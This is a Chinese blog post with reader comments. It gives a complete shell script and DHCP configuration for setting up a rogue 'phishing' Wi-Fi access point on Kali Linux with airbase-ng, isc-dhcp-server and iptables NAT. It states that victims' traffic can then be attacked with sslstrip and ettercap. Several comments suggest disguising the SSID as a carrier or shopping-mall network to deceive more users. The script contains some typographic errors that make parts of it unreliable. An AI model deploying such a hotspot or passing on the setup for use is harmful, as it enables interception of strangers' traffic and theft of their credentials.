Kali linux创建钓鱼wifi热点

枫少@KillBoy
枫少@KillBoy
管理员
220
文章
0
粉丝
Web安全6549,0083字数 0阅读0分0秒阅读模式
AI智能摘要
你是否对公共Wi-Fi的安全隐患感到担忧?本文将以kali linux为核心工具,为你揭示一个完整的、用于安全意识教育的钓鱼Wi-Fi热点搭建过程。我们将通过一段精心编排的shell脚本,手把手演示如何将无线网卡设置为监听模式、虚拟网络接口、配置DHCP服务并设置NAT规则。这不仅是一次技术实践,更是一次深刻的安全警醒。
— AI 生成的文章内容摘要
kali linux下的一些小工具。我是用物理机安装的kali linux,然后外接了一个无线网卡wlan2。

具体的技术细节记录一下,具体的shell脚本如下:
Kali linux创建钓鱼wifi热点

#! /bin/bash
case $1 in
    “start”)
       sleep 1
       ifconfig wlan2 down
       sleep 1
       iwconfig wlan2 mode monitor
       sleep 1
       ifconfig wlan2 up
       sleep 2
       airmon-ng start wlan2
       sleep 1
       airbase-ng -e hellotest  -c 11 wlan2
       sleep 1
    ;;
    “atup”)
       sleep 1
       ifconfig at0 up
       sleep 1
       ifconfig at0 10.0.0.1 netmask 255.255.255.0
       sleep 1
       route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
       sleep 1
       echo “1” >/proc/sys/net/ipv4/ip_forward
       sleep 2
       dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
       sleep 2
       service isc-dhcp-server start
       sleep 1
    ;;
    “startnat”)
       sleep 1
       iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
       sleep 1
       iptables -A FORWARD -i wlan2 -o wlan0 -j ACCEPT
       sleep 1
       iptables -A FORWARD -p tcp –-syn -s 10.0.0.0/24 -j TCPMSS –set-mss 1356
       sleep 2
    ;;*)
       echo “Usage $0 {start|atup|startnat}”
    ;;
    esac

将以上shell脚本保存为cr_wifi.sh,然后依次执行:

./cr_wifi.sh start
./cr_wifi atup
./cr_wifi startnat

执行完之后就可以完成钓鱼热点的创建,其他人链接热点上网的流量都会经过at0,然后利用sslstrip,ettercap就可以进行中间人攻击的一些操作了。

以上shell脚本主要有三个部分:

1,将外接无线网卡的模式修改成监听模式,创建一个SSID为hellotest的无线热点;

2,将网络流量虚拟到at0这块网卡上;启动配置好的DHCP服务器;

3,添加iptables规则,配置NAT。

执行shell脚本之前需要现配置好dhcp服务,DHCP用的是isc-dhcp-server,需要安装一下,它的配置文件(/etc/dhcp/dhcpd.conf)如下:

ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.1 10.0.0.25;
option domain-name-servers 114.114.114.114;
# option domain-name internal.example.org;
option routers 10.0.0.1;
option broadcast-address 10.0.0.250;
default-lease-time 600;
max-lease-time 7200;
}

 
枫少@KillBoy
评论  65  访客  65
    • 萌萌哒兔兔
      萌萌哒兔兔 1

      at0网卡那步老失败,有人遇到吗?

      • HadesShadow
        HadesShadow 0

        之前试过类似操作,dhcpd总崩

          • 太阳风语者
            太阳风语者 0

            @ HadesShadow dhcpd崩多半是端口冲突,记得先kill dhclient

          • 暗夜绘卷
            暗夜绘卷 0

            太危险了吧,随便连WiFi真有人中招

            • 孤月客
              孤月客 1

              iptables规则漏了输入链吧?

                • NyxVoid
                  NyxVoid 0

                  @ 孤月客 漏输入链确实容易被反向探测到

                • 深渊探索者
                  深渊探索者 0

                  感觉还行,公司内网测试用得上

                  • 梨园客
                    梨园客 0

                    sslstrip现在还能这么玩?

                    • GaiaEarth
                      GaiaEarth 0

                      我去,这脚本得小心点用啊

                        • 彩虹糖果
                          彩虹糖果 1

                          @ GaiaEarth 脚本跑起来一堆权限问题,新手慎碰

                        • 星河彼岸
                          星河彼岸 0

                          666,黑客大会既视感

                          • 云笈
                            云笈 0

                            想问下ettercap抓包怎么防?

                              • 蝴蝶结日记
                                蝴蝶结日记 1

                                @ 云笈 装个HTTPS Everywhere插件基本就防了大半

                              • 云端园丁
                                云端园丁 1

                                dhcpd.conf里range写成10.0.0.1起始有点怪吧

                                  • Juju
                                    Juju 0

                                    @ 云端园丁 hellotest这名字太假了,换成“商场免费WiFi”才够迷惑😂

                                  • 绿豆冰
                                    绿豆冰 0

                                    公司内网敢这么玩怕是要被开除😂

                                    • 表情包博士
                                      表情包博士 0

                                      之前用树莓派搭过类似环境,wlan2驱动折腾三天

                                        • 木水火
                                          木水火 0

                                          @ 表情包博士 树莓派那破驱动我也搞过,最后换了ALFA网卡才稳

                                        • 社交空调
                                          社交空调 1

                                          现在手机连WiFi都弹安全提示了,还管用吗?

                                          • 鹿乃子
                                            鹿乃子 1

                                            那个hellotest热点名也太明显了hhh

                                            • Zizi
                                              Zizi 0

                                              iptables那行MASQUERADE是不是该限定源地址?

                                              • 暗潮掌控者
                                                暗潮掌控者 0

                                                这配置在VMware里能跑通不?求问

                                                  • 沉默小猫
                                                    沉默小猫 1

                                                    @ 暗潮掌控者 VMware里无线网卡直通都费劲,更别说monitor模式了

                                                  • 古龙盟约者
                                                    古龙盟约者 0

                                                    hellotest这名字也太假了,起个“中国移动_5G”才真实😂

                                                    • 纸上江湖
                                                      纸上江湖 1

                                                      at0 up那步我老卡住,后来发现是airbase-ng没跑起来

                                                      • 佩兰芳
                                                        佩兰芳 1

                                                        这玩意搞不好要背锅啊😱

                                                          • 棉花糖的梦
                                                            棉花糖的梦 0

                                                            @ 佩兰芳 背锅警告不是吓人的,真有人拿这个搞事

                                                          • 篮球少年
                                                            篮球少年 0

                                                            公司内网测试?别了吧,IT一查日志直接找上门

                                                            • 剑客白岳
                                                              剑客白岳 1

                                                              现在安卓连这种热点都标“无互联网连接”,谁还输密码啊

                                                              • 游龙剑
                                                                游龙剑 1

                                                                dhcp range从.1开始确实怪,.1不是网关吗?

                                                                • 云袖轻纱
                                                                  云袖轻纱 0

                                                                  脚本sleep太多,能不能加个状态检测再继续?

                                                                    • 废柴天才
                                                                      废柴天才 0

                                                                      @ 云袖轻纱 加个while检测airmon-ng状态更稳,光sleep太玄学了

                                                                    • 辐射秃鹫
                                                                      辐射秃鹫 0

                                                                      手机连WiFi自动切流量了,钓鱼热点还有用?

                                                                      • 月球漫步
                                                                        月球漫步 1

                                                                        at0起不来十有八九是驱动问题,血泪教训

                                                                        • 暗黑仲裁者
                                                                          暗黑仲裁者 0

                                                                          这脚本在虚拟机里跑得通吗?求个避坑指南

                                                                          • 蜜糖包
                                                                            蜜糖包 1

                                                                            公司内网真不敢碰,IT部门查起来直接社死

                                                                            • AetherWing
                                                                              AetherWing 0

                                                                              安卓现在都标“无网络”,这招还能骗到人?

                                                                              • Lulu
                                                                                Lulu 0

                                                                                之前搞测试,ettercap抓不到HTTPS流量咋办

                                                                                • TuskTeller
                                                                                  TuskTeller 1

                                                                                  dhcpd.conf这配置我改过,老报错

                                                                                  • 虚无
                                                                                    虚无 0

                                                                                    那个range从.1开始确实离谱,网关都撞了

                                                                                    • yìyùn
                                                                                      yìyùn 1

                                                                                      手机连都不连,现在钓鱼热点是不是过时了

                                                                                      • 橙汁
                                                                                        橙汁 0

                                                                                        这个脚本sleep确实有点多,能不能优化下?

                                                                                        • 散步的猫
                                                                                          散步的猫 0

                                                                                          at0网卡起不来+1,折腾半天最后换了驱动才行

                                                                                          • 山魈猎手
                                                                                            山魈猎手 0

                                                                                            这操作在公共场合用会不会被抓啊🤔

                                                                                            • 鞋柜的拖鞋
                                                                                              鞋柜的拖鞋 0

                                                                                              手机连不上,是不是要关掉自动检测?

                                                                                              • 奔跑的猫
                                                                                                奔跑的猫 0

                                                                                                之前试过,安卓现在确实会提示无网络

                                                                                                • 时光荏苒
                                                                                                  时光荏苒 0

                                                                                                  hellotest这名字太搞笑了,谁会上当啊😂

                                                                                                  • 自由行囊
                                                                                                    自由行囊 0

                                                                                                    要是热点名字伪装成CMCC,成功率会不会高点?

                                                                                                    • 浮空梦境
                                                                                                      浮空梦境 1

                                                                                                      sslstrip还能用吗?好多站都强制HSTS了

                                                                                                      • Jojo
                                                                                                        Jojo 0

                                                                                                        虚拟机里跑这个,网卡设置会不会很麻烦?

                                                                                                        • 俏皮豆
                                                                                                          俏皮豆 0

                                                                                                          纯小白,完全看不懂这些命令是干啥的

                                                                                                          • 梧桐夜雨
                                                                                                            梧桐夜雨 1

                                                                                                            那个dhcpd.conf里网关和range冲突了吧?

                                                                                                            • 彩虹尽头
                                                                                                              彩虹尽头 1

                                                                                                              这配置在实体机跑起来卡不卡?

                                                                                                              • 剑无双
                                                                                                                剑无双 0

                                                                                                                sslstrip现在还能用?好多网站都强制https了

                                                                                                                • 星语星光
                                                                                                                  星语星光 1

                                                                                                                  之前用kali搞这个,驱动折腾死我了

                                                                                                                  • 天秤座的优雅
                                                                                                                    天秤座的优雅 1

                                                                                                                    at0网卡那步老是报错,咋整?

                                                                                                                    • 夜寒
                                                                                                                      夜寒 0

                                                                                                                      hellotest这名字太敷衍了吧😂

                                                                                                                      • 捕快吴
                                                                                                                        捕快吴 1

                                                                                                                        虚拟机里试了下,网卡设置好麻烦

                                                                                                                        • 山间茶语
                                                                                                                          山间茶语 0

                                                                                                                          这脚本sleep太多了,能精简不?

                                                                                                                          • 行迹如风
                                                                                                                            行迹如风 0

                                                                                                                            公司内网搞这个确实危险

                                                                                                                            • 书架上的书
                                                                                                                              书架上的书 1

                                                                                                                              纯小白表示完全看不懂

                                                                                                                              • 果冻小鹿
                                                                                                                                果冻小鹿 0

                                                                                                                                现在手机连wifi都自动检测了,还能钓到鱼?

                                                                                                                                • 西瓜汁喷射器
                                                                                                                                  西瓜汁喷射器 2

                                                                                                                                  ettercap抓包效果咋样?

                                                                                                                                  • 流云幻象
                                                                                                                                    流云幻象 0

                                                                                                                                    dhcpd.conf里range从.1开始真的没问题吗?

                                                                                                                                    • 极光信使
                                                                                                                                      极光信使 0

                                                                                                                                      这种操作还是小心点用

                                                                                                                                    匿名

                                                                                                                                    发表评论

                                                                                                                                    匿名网友

                                                                                                                                    拖动滑块以完成验证